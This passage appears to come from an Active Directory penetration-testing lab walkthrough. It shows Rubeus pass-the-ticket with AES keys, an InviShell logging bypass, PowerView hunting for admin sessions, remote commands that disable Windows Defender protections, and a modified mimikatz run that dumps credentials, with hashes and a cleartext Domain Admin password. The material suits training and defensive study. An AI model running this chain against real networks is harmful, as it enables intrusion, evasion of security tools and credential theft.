WEhVTnBcZEMn9QzyvDPGolFJEcqQ7YiyABHaExAPhucvxY3S2C/pqR858KfWKpa1CP8UgRhXoWPq7OM7
RQ8JWygq1YBqkwLPwBKTKLeSDVOprQtyRfeYD/w3lkQrrFoFhDZoQnODEVqJzXxXOJSx2ZWXW7UA+84I
SNGXJB1vu+1mr5DXxi9qBwj81JZwZTQYhouQ9RFAtIScK5HtXGKxZY92sfBS+A9Fs9lPIo0tsppXafdi
rmsNqZdRViAoYSAcbcQdOqTti0SpOiFHVLOjZt3ggGtsMCgSuFqf/fPAqYvCyH6WOtqghIWf9I2xFGBM
YtFIA1TZvSW0ac+Mbv+iMaJhBYxK4VGYLPqIO/7M/KbO6EgWFv8IZg/7QAumtzx22Ek3ioE8O1JuTSbx
KJ1ezrdPmN6JSl3wvDSr4QHqiMPPYiMcZgy7gV8J5K+AbTNsIF15jtrQeV/8zfQ5s+6+XZyracsx45+z
ZsM/i9nomJA6hyaJPWKFGpYYq8jjjdKZceQqcifu1nBqzReZGaOCAREwggENoAMCAQCiggEEBIIBAH2B
/TCB+qCB9zCB9DCB8aArMCmgAwIBEqEiBCCBFUXZbhf0dJasoIrndrr+M8gz0li1NMV1ZTzrxMd906Ec
GxpET0xMQVJDT1JQLk1PTkVZQ09SUC5MT0NBTKITMBGgAwIBAaEKMAgbBndlYnN2Y6MHAwUAQOEAAKUR
GA8yMDI0MDYyNjA4MjEzM1qmERgPMjAyNDA2MjYxODIxMzNapxEYDzIwMjQwNzAzMDgyMTMzWqgcGxpE
T0xMQVJDT1JQLk1PTkVZQ09SUC5MT0NBTKkvMC2gAwIBAqEmMCQbBmtyYnRndBsaRE9MTEFSQ09SUC5N
T05FWUNPUlAuTE9DQUw=
[*] Target LUID: 0xa437374
[+] Ticket successfully imported!

ServiceName : krbtgt/DOLLARCORP.MONEYCORP.LOCAL
ServiceRealm : DOLLARCORP.MONEYCORP.LOCAL
UserName : websvc
UserRealm : DOLLARCORP.MONEYCORP.LOCAL
StartTime : 6/26/2024 1:21:33 AM
EndTime : 6/26/2024 11:21:33 AM
RenewTill : 7/3/2024 1:21:33 AM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : aes256_cts_hmac_sha1
Base64(key) : gRVF2W4X9HSWrKCK53a6/jPIM9JYtTTFdWU868THfdM=
ASREP (key) : 2D84A12F614CCBF3D716B8339CBBE1A650E5FB352EDC8E879470ADE07E5412D7

A new PowerShell Window opens.


PS C:\Windows\system32> $env:username
student163
PS C:\Windows\system32> $env:computername
DCORP-STD163
PS C:\Windows\system32> Invoke-Command -ComputerName dcorp-adminsrv -ScriptBlock {
$env:username;$env:computername }
[dcorp-adminsrv] Connecting to remote server dcorp-adminsrv failed with the following error
message : Access is
denied. For more information, see the about_Remote_Troubleshooting Help topic.
+ CategoryInfo : OpenError: (dcorp-adminsrv:String) [], PSRemotingTransportException
+ FullyQualifiedErrorId : AccessDenied,PSSessionStateBroken

The user websvc does not have administrative privileges on the machine dcorp-adminsrv.

appadmin
C:\Windows\system32>C:\Ad\Tools\Rubeus.exe asktgt /user:appadmin
/aes256:68f08715061e4d0790e71b1245bf20b023d08822d2df85bff50a0e8136ffe4cb /opsec
/createnetonly:powershell.exe /show /ptt

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.2.1

[*] Action: Ask TGT

[*] Showing process : True


[*] Username : FLU53FIM
[*] Domain : PRU3HJCR
[*] Password : R51CW1DT
[+] Process : 'powershell.exe' successfully created with LOGON_TYPE = 9
[+] ProcessID : 4940
[+] LUID : 0x16a80e

[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)


[!] Pre-Authentication required!
[!] AES256 Salt: DOLLARCORP.MONEYCORP.LOCALappadmin
[*] Using aes256_cts_hmac_sha1 hash:
68f08715061e4d0790e71b1245bf20b023d08822d2df85bff50a0e8136ffe4cb
[*] Building AS-REQ (w/ preauth) for: 'dollarcorp.moneycorp.local\appadmin'
[*] Target LUID : 1484814
[*] Using domain controller: 172.16.2.1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

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
[*] Target LUID: 0x16a80e
[+] Ticket successfully imported!

ServiceName : krbtgt/DOLLARCORP.MONEYCORP.LOCAL
ServiceRealm : DOLLARCORP.MONEYCORP.LOCAL
UserName : appadmin
UserRealm : DOLLARCORP.MONEYCORP.LOCAL
StartTime : 6/26/2024 6:13:13 AM
EndTime : 6/26/2024 4:13:13 PM
RenewTill : 7/3/2024 6:13:13 AM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : aes256_cts_hmac_sha1
Base64(key) : pX2Vk3rCHfOL9Vkpd9ISEVVnwAHtGrT/w3sG5Hj5wa0=
ASREP (key) : 68F08715061E4D0790E71B1245BF20B023D08822D2DF85BFF50A0E8136FFE4CB

A new PowerShell Window opens.


PS C:\Windows\system32> $env:username
student163
PS C:\Windows\system32> $env:computername
DCORP-STD163
PS C:\Windows\system32> Invoke-Command -ComputerName dcorp-adminsrv -ScriptBlock {
$env:username;$env:computername }
appadmin
DCORP-ADMINSRV
PS C:\Windows\system32> C:\Ad\Tools\InviShell\RunWithPathAsAdmin.bat

C:\Windows\system32>set COR_ENABLE_PROFILING=1

C:\Windows\system32>set COR_PROFILER={cf0d821e-299b-5307-a3d8-b283c03916db}

C:\Windows\system32>set COR_PROFILER_PATH=C:\AD\Tools\InviShell\InShellProf.dll

C:\Windows\system32>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows
PS C:\Windows\system32> . C:\Ad\Tools\PowerView.ps1
PS C:\Windows\system32> Find-DomainUserLocation -CheckAccess

UserDomain :
UserName : Administrator
ComputerName : dcorp-appsrv.dollarcorp.moneycorp.local
SessionFrom : 172.16.2.1
SessionFromName :
LocalAdmin :

UserDomain :
UserName : Administrator
ComputerName : dcorp-appsrv.dollarcorp.moneycorp.local
SessionFrom : 172.16.2.1
SessionFromName :
LocalAdmin :
UserDomain :
UserName : Administrator
ComputerName : dcorp-appsrv.dollarcorp.moneycorp.local
SessionFrom : 172.16.2.1
SessionFromName :
LocalAdmin :

UserDomain :
UserName : Administrator
ComputerName : dcorp-appsrv.dollarcorp.moneycorp.local
SessionFrom : 172.16.2.1
SessionFromName :
LocalAdmin :

UserDomain :
UserName : Administrator
ComputerName : dcorp-appsrv.dollarcorp.moneycorp.local
SessionFrom : 172.16.2.1
SessionFromName :
LocalAdmin :

UserDomain :
UserName : Administrator
ComputerName : dcorp-appsrv.dollarcorp.moneycorp.local
SessionFrom : 172.16.2.1
SessionFromName :
LocalAdmin :

UserDomain :
UserName : Administrator
ComputerName : dcorp-appsrv.dollarcorp.moneycorp.local
SessionFrom : 172.16.2.1
SessionFromName :
LocalAdmin :

UserDomain :
UserName : Administrator
ComputerName : dcorp-appsrv.dollarcorp.moneycorp.local
SessionFrom : 172.16.2.1
SessionFromName :
LocalAdmin :

UserDomain :
UserName : Administrator
ComputerName : dcorp-appsrv.dollarcorp.moneycorp.local
SessionFrom : 172.16.2.1
SessionFromName :
LocalAdmin :

UserDomain :
UserName : Administrator
ComputerName : dcorp-appsrv.dollarcorp.moneycorp.local
SessionFrom : 172.16.2.1
SessionFromName :
LocalAdmin :

UserDomain :
UserName : Administrator
ComputerName : dcorp-appsrv.dollarcorp.moneycorp.local
SessionFrom : 172.16.2.1
SessionFromName :
LocalAdmin :

There is a session of Administrator (Domain Admin) on the machine DCORP-APPSRV. We will now dump
the credentials from the machine DCORP-APPSRV to see if we can obtain the hashes of the Domain Admin
"Administrator".
PS C:\Windows\system32> $Session = New-PSSession -ComputerName DCORP-APPSRV
PS C:\Windows\system32> Invoke-Command -Session $Session -ScriptBlock {Set-MpPreference -
DisableRealtimeMonitoring $true}
PS C:\Windows\system32> Invoke-Command -Session $Session -ScriptBlock {Set-MpPreference -
DisableBehaviorMonitoring $true}
PS C:\Windows\system32> Invoke-Command -Session $Session -ScriptBlock {Set-MpPreference -
DisableIntrusionPreventionSystem $true}
PS C:\Windows\system32> Invoke-Command -Session $Session -ScriptBlock {Set-MpPreference -
DisableIOAVProtection $true}
PS C:\Windows\system32> . C:\Ad\tools\Invoke-MimiEx_Modified.ps1
PS C:\Windows\system32> Invoke-Mimi
PS C:\Windows\system32> Invoke-Command -Session $Session -ScriptBlock ${Function:Invoke-Mimi}

.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 18:36:14


.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(powershell) # sekurlsa::ekeys

Authentication Id : 0 ; 172030 (00000000:00029ffe)


Session : RemoteInteractive from 2
User Name : appadmin
Domain : dcorp
Logon Server : DCORP-DC
Logon Time : 2/26/2024 3:57:38 AM
SID : S-1-5-21-719815819-3726368948-3917688648-1117

* Username : appadmin
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac 68f08715061e4d0790e71b1245bf20b023d08822d2df85bff50a0e8136ffe4cb
rc4_hmac_nt d549831a955fee51a43c83efb3928fa7
rc4_hmac_old d549831a955fee51a43c83efb3928fa7
rc4_md4 d549831a955fee51a43c83efb3928fa7
rc4_hmac_nt_exp d549831a955fee51a43c83efb3928fa7
rc4_hmac_old_exp d549831a955fee51a43c83efb3928fa7

Authentication Id : 0 ; 141349 (00000000:00022825)


Session : Interactive from 2
User Name : UMFD-2
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 2/26/2024 3:57:04 AM
SID : S-1-5-96-0-2

* Username : DCORP-APPSRV$
* Domain : dollarcorp.moneycorp.local
* Password :
Md9Dq"q!"p2QG3GZyR>9yMw/lo0v)49RA)cj/TAlNinYB$zDGTdU]vUYs1/Bfe?AbXScy#^4_Ani_v"ABGC`hlp,$=Sm?M19u
n%6QdFsVpR@Pc[xv$W&=< V
* Key List :
aes256_hmac f33c9de6651ff05a464c4babac70f29c164eb748fc600106a6b156fc29f1c839
aes128_hmac d99e2c35e79a64be0b151393f423c7ef
rc4_hmac_nt b4cb7bf8b93c78b8051c7906bb054dc5
rc4_hmac_old b4cb7bf8b93c78b8051c7906bb054dc5
rc4_md4 b4cb7bf8b93c78b8051c7906bb054dc5
rc4_hmac_nt_exp b4cb7bf8b93c78b8051c7906bb054dc5
rc4_hmac_old_exp b4cb7bf8b93c78b8051c7906bb054dc5

Authentication Id : 0 ; 996 (00000000:000003e4)


Session : Service from 0
User Name : DCORP-APPSRV$
Domain : dcorp
Logon Server : (null)
Logon Time : 2/26/2024 3:56:47 AM
SID : S-1-5-20

* Username : dcorp-appsrv$
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac f5ae52b9f36f1e41b2f0c59a3c18aa4367c27c3e1a450ef4d4df010210d054cd
rc4_hmac_nt b4cb7bf8b93c78b8051c7906bb054dc5
rc4_hmac_old b4cb7bf8b93c78b8051c7906bb054dc5
rc4_md4 b4cb7bf8b93c78b8051c7906bb054dc5
rc4_hmac_nt_exp b4cb7bf8b93c78b8051c7906bb054dc5
rc4_hmac_old_exp b4cb7bf8b93c78b8051c7906bb054dc5

Authentication Id : 0 ; 21211 (00000000:000052db)


Session : Interactive from 0
User Name : UMFD-0
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 2/26/2024 3:56:47 AM
SID : S-1-5-96-0-0

* Username : DCORP-APPSRV$
* Domain : dollarcorp.moneycorp.local
* Password :
Md9Dq"q!"p2QG3GZyR>9yMw/lo0v)49RA)cj/TAlNinYB$zDGTdU]vUYs1/Bfe?AbXScy#^4_Ani_v"ABGC`hlp,$=Sm?M19u
n%6QdFsVpR@Pc[xv$W&=< V
* Key List :
aes256_hmac f33c9de6651ff05a464c4babac70f29c164eb748fc600106a6b156fc29f1c839
aes128_hmac d99e2c35e79a64be0b151393f423c7ef
rc4_hmac_nt b4cb7bf8b93c78b8051c7906bb054dc5
rc4_hmac_old b4cb7bf8b93c78b8051c7906bb054dc5
rc4_md4 b4cb7bf8b93c78b8051c7906bb054dc5
rc4_hmac_nt_exp b4cb7bf8b93c78b8051c7906bb054dc5
rc4_hmac_old_exp b4cb7bf8b93c78b8051c7906bb054dc5

Authentication Id : 0 ; 21183 (00000000:000052bf)


Session : Interactive from 1
User Name : UMFD-1
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 2/26/2024 3:56:47 AM
SID : S-1-5-96-0-1

* Username : DCORP-APPSRV$
* Domain : dollarcorp.moneycorp.local
* Password :
Md9Dq"q!"p2QG3GZyR>9yMw/lo0v)49RA)cj/TAlNinYB$zDGTdU]vUYs1/Bfe?AbXScy#^4_Ani_v"ABGC`hlp,$=Sm?M19u
n%6QdFsVpR@Pc[xv$W&=< V
* Key List :
aes256_hmac f33c9de6651ff05a464c4babac70f29c164eb748fc600106a6b156fc29f1c839
aes128_hmac d99e2c35e79a64be0b151393f423c7ef
rc4_hmac_nt b4cb7bf8b93c78b8051c7906bb054dc5
rc4_hmac_old b4cb7bf8b93c78b8051c7906bb054dc5
rc4_md4 b4cb7bf8b93c78b8051c7906bb054dc5
rc4_hmac_nt_exp b4cb7bf8b93c78b8051c7906bb054dc5
rc4_hmac_old_exp b4cb7bf8b93c78b8051c7906bb054dc5

Authentication Id : 0 ; 999 (00000000:000003e7)


Session : UndefinedLogonType from 0
User Name : DCORP-APPSRV$
Domain : dcorp
Logon Server : (null)
Logon Time : 2/26/2024 3:56:46 AM
SID : S-1-5-18

* Username : dcorp-appsrv$
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac f5ae52b9f36f1e41b2f0c59a3c18aa4367c27c3e1a450ef4d4df010210d054cd
rc4_hmac_nt b4cb7bf8b93c78b8051c7906bb054dc5
rc4_hmac_old b4cb7bf8b93c78b8051c7906bb054dc5
rc4_md4 b4cb7bf8b93c78b8051c7906bb054dc5
rc4_hmac_nt_exp b4cb7bf8b93c78b8051c7906bb054dc5
rc4_hmac_old_exp b4cb7bf8b93c78b8051c7906bb054dc5

mimikatz(powershell) # exit
Bye!

Even though the output of Find-DomainUserLocation showed a session of the Domain Admin
"Administrator" on DCORP-APPSRV, its hash was not present in the dumped credentials.

srvadmin
C:\Windows\system32>C:\Ad\Tools\Rubeus.exe asktgt /user:srvadmin
/aes256:145019659e1da3fb150ed94d510eb770276cfbd0cbd834a4ac331f2effe1dbb4 /opsec
/createnetonly:powershell.exe /show /ptt

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.2.1

[*] Action: Ask TGT


[*] Showing process : True
[*] Username : 86KBZBOP
[*] Domain : AVUV5NKJ
[*] Password : 7TUUDOH6
[+] Process : 'powershell.exe' successfully created with LOGON_TYPE = 9
[+] ProcessID : 5828
[+] LUID : 0xb54ff6

[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)


[!] Pre-Authentication required!
[!] AES256 Salt: DOLLARCORP.MONEYCORP.LOCALsrvadmin
[*] Using aes256_cts_hmac_sha1 hash:
145019659e1da3fb150ed94d510eb770276cfbd0cbd834a4ac331f2effe1dbb4
[*] Building AS-REQ (w/ preauth) for: 'dollarcorp.moneycorp.local\srvadmin'
[*] Target LUID : 11882486
[*] Using domain controller: 172.16.2.1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

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
[*] Target LUID: 0xb54ff6
[+] Ticket successfully imported!

ServiceName : krbtgt/DOLLARCORP.MONEYCORP.LOCAL
ServiceRealm : DOLLARCORP.MONEYCORP.LOCAL
UserName : srvadmin
UserRealm : DOLLARCORP.MONEYCORP.LOCAL
StartTime : 6/27/2024 2:24:43 AM
EndTime : 6/27/2024 12:24:43 PM
RenewTill : 7/4/2024 2:24:43 AM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : aes256_cts_hmac_sha1
Base64(key) : SkCxLId9RtoCN10xgmU44GpQrVMCeMxubrbD25poTbU=
ASREP (key) : 145019659E1DA3FB150ED94D510EB770276CFBD0CBD834A4AC331F2EFFE1DBB4

A new PowerShell Window opens.


PS C:\Windows\system32> . C:\Ad\Tools\PowerView.ps1
PS C:\Windows\system32> Find-DomainUserLocation -CheckAccess

UserDomain : dcorp
UserName : svcadmin
ComputerName : dcorp-mgmt.dollarcorp.moneycorp.local
IPAddress : 172.16.4.44
SessionFrom :
SessionFromName :
LocalAdmin :

There is a session of svcadmin (Domain Admin) on the machine DCORP-MGMT. We will now dump the
credentials from the machine DCORP-MGMT to see if we can obtain the hashes of the Domain Admin
"svcadmin".
PS C:\Windows\system32> . C:\Ad\Tools\Invoke-MimiEx_Modified.ps1
PS C:\Windows\system32> $Session = New-PSSession -ComputerName dcorp-mgmt
PS C:\Windows\system32> Invoke-Command -Session $Session -ScriptBlock {Set-MpPreference -
DisableRealtimeMonitoring $true}
PS C:\Windows\system32> Invoke-Command -Session $Session -ScriptBlock {Set-MpPreference -
DisableBehaviorMonitoring $true}
PS C:\Windows\system32> Invoke-Command -Session $Session -ScriptBlock {Set-MpPreference -
DisableIntrusionPreventionSystem $true}
PS C:\Windows\system32> Invoke-Command -Session $Session -ScriptBlock {Set-MpPreference -
DisableIOAVProtection $true}
PS C:\Windows\system32> Invoke-Command -Session $Session -ScriptBlock ${Function:Invoke-Mimi}

.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 18:36:14


.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(powershell) # sekurlsa::ekeys

Authentication Id : 0 ; 56541 (00000000:0000dcdd)


Session : Service from 0
User Name : svcadmin
Domain : dcorp
Logon Server : DCORP-DC
Logon Time : 2/21/2024 3:15:55 AM
SID : S-1-5-21-719815819-3726368948-3917688648-1118

* Username : svcadmin
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : *ThisisBlasphemyThisisMadness!!
* Key List :
aes256_hmac 6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011
aes128_hmac 8c0a8695795df6c9a85c4fb588ad6cbd
rc4_hmac_nt b38ff50264b74508085d82c69794a4d8
rc4_hmac_old b38ff50264b74508085d82c69794a4d8
rc4_md4 b38ff50264b74508085d82c69794a4d8
rc4_hmac_nt_exp b38ff50264b74508085d82c69794a4d8
rc4_hmac_old_exp b38ff50264b74508085d82c69794a4d8

Authentication Id : 0 ; 54690 (00000000:0000d5a2)


Session : Service from 0
User Name : SQLTELEMETRY
Domain : NT Service
Logon Server : (null)
Logon Time : 2/21/2024 3:15:54 AM
SID : S-1-5-80-2652535364-2169709536-2857650723-2622804123-1107741775

* Username : DCORP-MGMT$
* Domain : dollarcorp.moneycorp.local
* Password :
4?PhChKP(`?yW`E8=VM2QI13O!i*3Q?WVB"X)=>Il3=AczJ0^T!X]r&:&yG41`*/$^4+EeZ07?zF2Z3`:[Jd*F/z_P`p6B9XH
^g$*mXIQMXY(Sc?3\A6ICrX
* Key List :
aes256_hmac c71f382ea61f80cab751aada32a477b7f9617f3b4a8628dc1c8757db5fdb5076
aes128_hmac b3b9f96ed137fb4c079dcfe2e23f7854
rc4_hmac_nt 0878da540f45b31b974f73312c18e754
rc4_hmac_old 0878da540f45b31b974f73312c18e754
rc4_md4 0878da540f45b31b974f73312c18e754
rc4_hmac_nt_exp 0878da540f45b31b974f73312c18e754
rc4_hmac_old_exp 0878da540f45b31b974f73312c18e754

Authentication Id : 0 ; 996 (00000000:000003e4)


Session : Service from 0
User Name : DCORP-MGMT$
Domain : dcorp
Logon Server : (null)
Logon Time : 2/21/2024 3:15:49 AM
SID : S-1-5-20

* Username : dcorp-mgmt$
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac b607d794f87ca117a14353da0dbb6f27bbe9fed4f1ce1b810b43fbb9a2eab192
rc4_hmac_nt 0878da540f45b31b974f73312c18e754
rc4_hmac_old 0878da540f45b31b974f73312c18e754
rc4_md4 0878da540f45b31b974f73312c18e754
rc4_hmac_nt_exp 0878da540f45b31b974f73312c18e754
rc4_hmac_old_exp 0878da540f45b31b974f73312c18e754

Authentication Id : 0 ; 20862 (00000000:0000517e)


Session : Interactive from 0
User Name : UMFD-0
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 2/21/2024 3:15:49 AM
SID : S-1-5-96-0-0

* Username : DCORP-MGMT$
* Domain : dollarcorp.moneycorp.local
* Password :
4?PhChKP(`?yW`E8=VM2QI13O!i*3Q?WVB"X)=>Il3=AczJ0^T!X]r&:&yG41`*/$^4+EeZ07?zF2Z3`:[Jd*F/z_P`p6B9XH
^g$*mXIQMXY(Sc?3\A6ICrX
* Key List :
aes256_hmac c71f382ea61f80cab751aada32a477b7f9617f3b4a8628dc1c8757db5fdb5076
aes128_hmac b3b9f96ed137fb4c079dcfe2e23f7854
rc4_hmac_nt 0878da540f45b31b974f73312c18e754
rc4_hmac_old 0878da540f45b31b974f73312c18e754
rc4_md4 0878da540f45b31b974f73312c18e754
rc4_hmac_nt_exp 0878da540f45b31b974f73312c18e754
rc4_hmac_old_exp 0878da540f45b31b974f73312c18e754

Authentication Id : 0 ; 1027589 (00000000:000fae05)


Session : Interactive from 0
User Name : mgmtadmin
Domain : dcorp
